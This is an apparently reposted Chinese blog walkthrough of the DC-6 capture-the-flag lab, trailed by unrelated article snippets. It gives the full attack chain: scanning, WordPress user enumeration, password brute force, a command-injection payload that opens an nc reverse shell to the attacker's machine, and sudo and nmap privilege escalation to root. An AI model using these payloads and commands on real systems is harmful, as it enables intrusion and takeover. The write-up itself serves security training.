【DC-6靶场渗透】-程序员宅基地

技术标签：安全 web安全漏洞靶场渗透 linux 网络安全

文章目录

前言

一、确定靶场地址

前言

今天做一下DC6靶场

一、确定靶场地址

1、查看靶机mac地址

2、kali使用nmap，arp-scan工具扫描

nmap -sn 172.16.100.0/24
arp-scan 172.16.100.0/24

IP地址为：172.16.100.227

二、信息收集

1、nmap探测开放端口及服务

nmap -sT -sV -A -p- --min-rate 2000 172.16.100.227

探测到开放了80端口-http服务，22端口-ssh服务

2、访问80端口

如果直接使用ip访问会跳转到http://wordy/，而无法正常加载出来。

所以需要我们去添加hosts文件，跳转域名来访问靶场ip。

Windows：可以访问本地hosts，打开C:\Windows\System32\drivers\etc，修改hosts文件。

172.16.100.227 wordy

3、dirsearch,dirb,nikto,御剑等扫描目录

发现有后台登陆地址

同时通过wappalyzer发现使用的是wordpress的cms

三、账号枚举并破解

可以尝试wpscan进行扫描获得网站用户名。

wpscan --url wordy -e u

发现五个用户名，将五个用户保存在一个文件user.txt里

根据靶场作者提示

使用提示的命令生成一个字典，如果提示没有这个文件，先进到目录去把rockyou压缩包解压。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用wpscan进行爆破

wpscan --url http://wordy -U user.txt -P passwords.txt

爆破出一组账号密码：mark/helpdesk01

尝试登陆后台可登陆成功

四、寻找漏洞

通过前面信息收集我们知道网站使用的是wordpress的cms,版本是5.1.1

使用searchsploit检查是否有对应的漏洞

searchsploit wordpress 5.1.1

可以看到存在远程命令执行漏洞

再通过查资料知道在插件的tools界面，存在命令执行漏洞，可以利用进行反弹shell

在ip参数后加入要执行的命令，成功执行。这里有个前端字符限制修改一下就行，点击lookup。

五、反弹shell

kali使用命令：nc -lvvp 8088开始监听。

brup修改参数 127.0.0.1 | nc -e /bin/bash kali的IP 8088

交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

六、提权

ls -alhR /home，列出/home目录下的所有文件，发现几个隐私文件

在things-to-do.txt文件中，我们看到了账号和密码。

因为我们前面看到了有开ssh服务，所以我们可以尝试用账号登录

尝试使用sudo提权

发现graham可以用jens的身份执行 /home/jens/backups.sh，把 /bin/bash追加到这个文件，然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

cd /home/jens
echo '/bin/bash' >> backups.sh
sudo -u jens ./backups.sh

执行 sudo -l查看一下有没有可以提权的命令

发现可以用root权限执行nmap,我们可以借助网站搜索nmap提权命令

nmap | GTFOBins

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

提权后依旧使用命令可得到交互式shell

提权成功，可以读取最后的flag了。

cd /root
cat theflag.txt

本文链接：https://blog.csdn.net/qq_61872115/article/details/135619130

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

c# 调用c++ lib静态库_c#调用lib-程序员宅基地

文章浏览阅读2w次，点赞7次，收藏51次。四个步骤1.创建C++ Win32项目动态库dll 2.在Win32项目动态库中添加外部依赖项 lib头文件和lib库3.导出C接口4.c#调用c++动态库开始你的表演...①创建一个空白的解决方案，在解决方案中添加 Visual C++ , Win32 项目空白解决方案的创建：添加Visual C++ , Win32 项目这......_c#调用lib

deepin/ubuntu安装苹方字体-程序员宅基地

文章浏览阅读4.6k次。苹方字体是苹果系统上的黑体，挺好看的。注重颜值的网站都会使用，例如知乎：font-family: -apple-system, BlinkMacSystemFont, Helvetica Neue, PingFang SC, Microsoft YaHei, Source Han Sans SC, Noto Sans CJK SC, W..._ubuntu pingfang

html表单常见操作汇总_html表单的处理程序有那些-程序员宅基地

文章浏览阅读159次。表单表单概述表单标签表单域按钮控件demo表单标签表单标签基本语法结构<form action="处理数据程序的url地址“ method=”get|post“ name="表单名称”></form><!--method将表单中的数据传送给服务器处理，get方式直接显示在url地址中，数据可以被缓存，且长度有限制；而post方式数据隐藏传输，_html表单的处理程序有那些

PHP设置谷歌验证器（Google Authenticator）实现操作二步验证_php otp 验证器-程序员宅基地

文章浏览阅读1.2k次。使用说明:开启Google的登陆二步验证（即Google Authenticator服务）后用户登陆时需要输入额外由手机客户端生成的一次性密码。实现Google Authenticator功能需要服务器端和客户端的支持。服务器端负责密钥的生成、验证一次性密码是否正确。客户端记录密钥后生成一次性密码。下载谷歌验证类库文件放到项目合适位置(我这边放在项目Vender下面)https://github.com/PHPGangsta/GoogleAuthenticatorPHP代码示例://引入谷_php otp 验证器

【Python】matplotlib.plot画图横坐标混乱及间隔处理_matplotlib更改横轴间距-程序员宅基地

文章浏览阅读4.3k次，点赞5次，收藏11次。matplotlib.plot画图横坐标混乱及间隔处理_matplotlib更改横轴间距

docker — 容器存储_docker 保存容器-程序员宅基地

文章浏览阅读2.2k次。①Storage driver 处理各镜像层及容器层的处理细节，实现了多层数据的堆叠，为用户提供了多层数据合并后的统一视图②所有 Storage driver 都使用可堆叠图像层和写时复制（CoW）策略③docker info 命令可查看当系统上的 storage driver主要用于测试目的，不建议用于生成环境。_docker 保存容器

随便推点

网络拓扑结构_网络拓扑csdn-程序员宅基地

文章浏览阅读834次，点赞27次，收藏13次。网络拓扑结构是指计算机网络中各组件（如计算机、服务器、打印机、路由器、交换机等设备）及其连接线路在物理布局或逻辑构型上的排列形式。这种布局不仅描述了设备间的实际物理连接方式，也决定了数据在网络中流动的路径和方式。不同的网络拓扑结构影响着网络的性能、可靠性、可扩展性及管理维护的难易程度。_网络拓扑csdn

JS重写Date函数，兼容IOS系统_date.prototype 将所有 ios-程序员宅基地

文章浏览阅读1.8k次，点赞5次，收藏8次。IOS系统Date的坑要创建一个指定时间的new Date对象时，通常的做法是：new Date("2020-09-21 11:11:00")这行代码在 PC 端和安卓端都是正常的，而在 iOS 端则会提示 Invalid Date 无效日期。在IOS年月日中间的横岗许换成斜杠，也就是new Date("2020/09/21 11:11:00")通常为了兼容IOS的这个坑，需要做一些额外的特殊处理，笔者在开发的时候经常会忘了兼容IOS系统。所以就想试着重写Date函数，一劳永逸，避免每次ne_date.prototype 将所有 ios